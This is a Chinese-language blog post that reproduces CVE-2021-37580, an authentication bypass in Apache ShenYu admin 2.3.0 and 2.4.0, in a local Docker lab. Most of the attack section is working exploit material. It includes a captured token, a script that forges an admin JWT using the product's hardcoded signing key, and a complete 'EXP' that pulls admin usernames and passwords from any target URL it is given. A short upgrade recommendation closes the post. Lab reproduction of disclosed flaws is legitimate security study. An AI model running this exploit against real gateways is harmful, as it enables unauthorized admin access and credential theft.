Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580

已于 2023-12-21 15:26:11 修改
阅读量1k 收藏 8
点赞数 9
分类专栏: apache漏洞合集-亲测 文章标签: apache 网络安全
于 2023-12-21 15:25:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135129863
版权

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现


Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现)

漏洞名称

漏洞描述

Apache ShenYu是一个异步的,高性能的,跨语言的,响应式的API网关,Apache ShenYu功能十分强大且易于扩展,支持各种语言的http协议,同时支持Dubbo、 Spring Cloud、 gRPC、 Motan、 Sofa、 Tars 等协议。2021年11月,Apache ShenYu被爆出存在身份认证绕过漏洞,攻击者可以通过该漏洞绕过JWT(JSON Web Token)安全认证机制,直接进入系统后台。

影响版本

Apache ShenYu 2.3.0
Apache ShenYu 2.4.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:9095
攻击者IP:192.168.63.1

docker直接拉取环境

docker pull apache/shenyu-admin:2.4.0
docker network create shenyu
docker run -d -p 9095:9095 --net shenyu apache/shenyu-admin:2.4.0

环境启动后,访问http://192.168.63.129:9095即可看到一个shenyu页面,说明已成功启动,使用admin/123456登录系统。

在这里插入图片描述

漏洞利用

创建一个wahaha/wahaha,权限为default,使用刚创建的用户登录系统。

在这里插入图片描述

显示登录用户的角色未配置菜单权限

在这里插入图片描述

使用burp抓包,在响应体中返回了token。

在这里插入图片描述

更改请求路径为/dashboardUser,并在请求头加入X-Access-Token字段,成功返回admin的账户和密码。

X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IndhaGFoYSIsImV4cCI6MTcwMzE0MTE1Nn0.Y0U14VyZ0aQ32Y-YX9tz7LF3qCD_R5GPxP563BOUDEs

在这里插入图片描述

如果没有获取到普通用户的token,可以使用脚本生成admin的token,成功获取信息。

pip install PyJWT
python cve-2021-37580.py http://192.168.63.129:9095

import time
from jwt import PyJWT

if __name__ == "__main__":
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    salt = "2095132720951327"
    exp = int(time.time())
    payload = {
        "userName": 'admin',
        "exp": exp
    }
    token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)
    print(token)

sss
在这里插入图片描述

完整的EXP:

import requests
import re
import time
from jwt import PyJWT


def generateToken():
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    salt = "2095132720951327"
    exp = int(time.time())
    payload = {
        "userName": 'admin',
        "exp": exp
    }
    token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)
    return token


if __name__ == "__main__":
    import sys
    try:
        url=sys.argv[1]
    except:
        print("Usage: %s http://www.baidu.com")
        exit(0)
    if isinstance(url,str):
        url1 = url + '/dashboardUser'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
            'X-Access-Token': generateToken()
        }
        try:
            response = requests.get(url1, headers=headers, verify=False, timeout=3).json()
            print(response)
        except:
            print("没有该漏洞")

修复建议

1、升级至最新版本

https://shenyu.apache.org/download/

总结

payload的意思是使用了一个JWT令牌(X-Access-Token),对其进行Base64解码可得到攻击者尝试的用户为 "userName": "admin"。由于服务端在使用JWT的时候,也没有校验key,导致任意能解码的JWT,并且只要用户(userName的值)存在,都能通过校验。如果攻击成功,在响应头中返回的状态码为200,且在响应体中返回"query success"、"userName":""、"passwprd":""字样。

Bolgzhang
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache ShenYu网关 v2.6.1.zip
03-18
Apache ShenYu网关 v2.6.1.zip
SpringBoot学习:接口鉴权JWT
大小鱼鱼鱼鱼鱼
06-13 5206
import static org.apache.commons.lang3.StringUtils.defaultIfBlank; import static org.apache.commons.lang3.math.NumberUtils.toInt; import static org.apache.commons.lang3.math.NumberUtils.toLong; /** ...
JWT(Json web token)
qq_53957101的博客
10-23 4065
JWT简单使用就是生成token和解析token的工具类。JWT可以与Shiro和SpringSecurity连用。
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)复现
m0_69994768的博客
01-23 1005
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088)
接收Request请求Bearer令牌参数
PHPer技术栈
06-06 4135
接收Request请求Bearer令牌参数
PHP接口数据安全解决方案(二)
热门推荐
withoutfear的博客
10-08 1万+
前言 实例演示token签名并创建token 解析token并校验token合法性 类库封装管理jwt实例 前言 JWT是什么 JWT是json web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法。 它定义了一种用于简洁,自包含的用于通信双方之间以 JSON 对象的形式安全传递信息的方法。JWT 可以使用 HMAC 算法或者
Apache ShenYu网关 v2.6.0.zip
10-03
Apache ShenYu网关 v2.6.0.zip
Python库 | Apache-ShenYu-Client-0.1.1.tar.gz
05-12
资源分类:Python库 所属语言:Python 资源全名:Apache-ShenYu-Client-0.1.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
incubator-shenyu-dashboard:阿帕奇神宇仪表盘
07-24
神宇仪表盘概述沉宇Dashboard是一个管理背景...startnpm start生产环境 # install dependencies in this project root path.npm install# build for productionnpm run build# copy to shenyu-admincp -rf dist/ * shen
Apache ShenYu
05-04
Proxy: Support for Apache Dubbo, Spring Cloud, gRPC, Motan, SOFA, TARS, WebSocket, MQTT Security: Sign, OAuth 2.0, JSON Web Tokens, WAF plugin API governance: Request, response, parameter mapping, ...
shenyu-master.zip
03-19
Apache ShenYu 国内镜像仓库
Apache ShenYu是一个Java原生API网关,用于服务代理协议转换和API治理.zip
最新发布
05-21
Apache ShenYu是一个Java原生API网关,用于服务代理协议转换和API治理
一个轻量级 Java 权限认证框架让鉴权变得简单优雅-登录认证权限认证分布式Session会话微服务网关鉴权
04-14
—— 可集成Redis、Memcached等专业缓存中间件,重启数据不丢失分布式会话 —— 提供jwt集成、共享数据中心两种分布式会话方案微服务网关鉴权 —— 适配Gateway、ShenYu、Zuul等常见网关的路由拦截认证单点登录 ...
apisix-website:Apache APISIX网站
04-12
Apache APISIX:trade_mark:网站 云原生微服务api网关的网站。 用法 $ cd website $ yarn $ yarn start 多亏了
python自动化接口获取token值方法
weixin_39539041的博客
01-07 3979
前言: 在做接口测试中我们经常会遇到需要一个登陆token,或者获取其他用到的参数来关联下一个接口用到的参数。在接口自动化测试中怎么样能获取到token? 1.在返回参数中,获取: { “code”: 200, “message”: “操作成功”, “token”: “eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJ3ZWIiLCJpc3” } # 获取token str_1 = { "code": 200, "message": "操作成功", "t
使用Token进行身份验证
m0_57037182的博客
06-10 1万+
token,简简单单帮你上手实现
jjwt令牌(Java JSON Web Token)
weixin_44773418的博客
04-16 4151
JWT JSON Web TokenJWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在用户和服务器之间传递安全可靠的信息。 一个JWT实际上就是一个字符串,它由三部分组成,头部、载荷与签名。 头部(Header) 头部用于描述关于该JWT的最基本的信息,例如其类型以及签名所用的算法等。这也可以被表示成一个JSON对象。 {"typ":"JWT","alg":"HS256"} 在头部指明...
Spring Cloud Gateway微服务网关限流与JWT鉴权
XYZ
08-21 3599
不同的微服务一般会有不同的网络地址,而外部客户端可能需要调用多个服务的接口,存在一些问题: 页面需要对接多个域名,非常繁琐; 安全隐患,服务端暴露的接口增加,增加服务器受攻击的面积; 跨域问题; 认证复杂。 微服务网关的主要作用: 整合各个微服务的功能,形成一套系统; 在微服务网关中实现日志的统一记录; 实现用户的操作跟踪; 实现限流操作; 用户权限认证操作。 实现微服务网关的技术有很多: nginx:一个高性能HTTP和反向代理web服务器,同时提供了IMAP/POP3/SMTP服务;(一般用于
shenyu网关 码云
09-10
shenyu网关是一款开源的API网关软件,它可以帮助开发者实现对接口的统一管理和流量控制。shenyu网关提供了多种功能,包括请求转发、请求过滤、流量限制、负载均衡等,帮助用户实现高可用和高稳定性的系统架构。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值